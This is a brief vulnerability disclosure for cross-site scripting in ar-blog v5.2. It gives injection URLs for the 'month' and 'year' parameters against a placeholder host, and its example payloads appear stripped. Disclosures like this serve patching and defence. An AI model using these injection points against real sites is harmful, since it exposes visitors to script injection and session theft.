Software: ar-blog Web Site: http://www.ar-blog.com Versions: ar-blog v 5.2 Type: Cross Site Scripting Class: Remote Exploit : 1- http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all=9 2- http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9 Example : 1- http://www.target.com/index.php?page=showtopis&month= 2- http://www.target.com/index.php?page=showtopis&month=9&year=&all=9 Discovered by: SAUDI L-G-H Team http://www.lezr.com Regards ///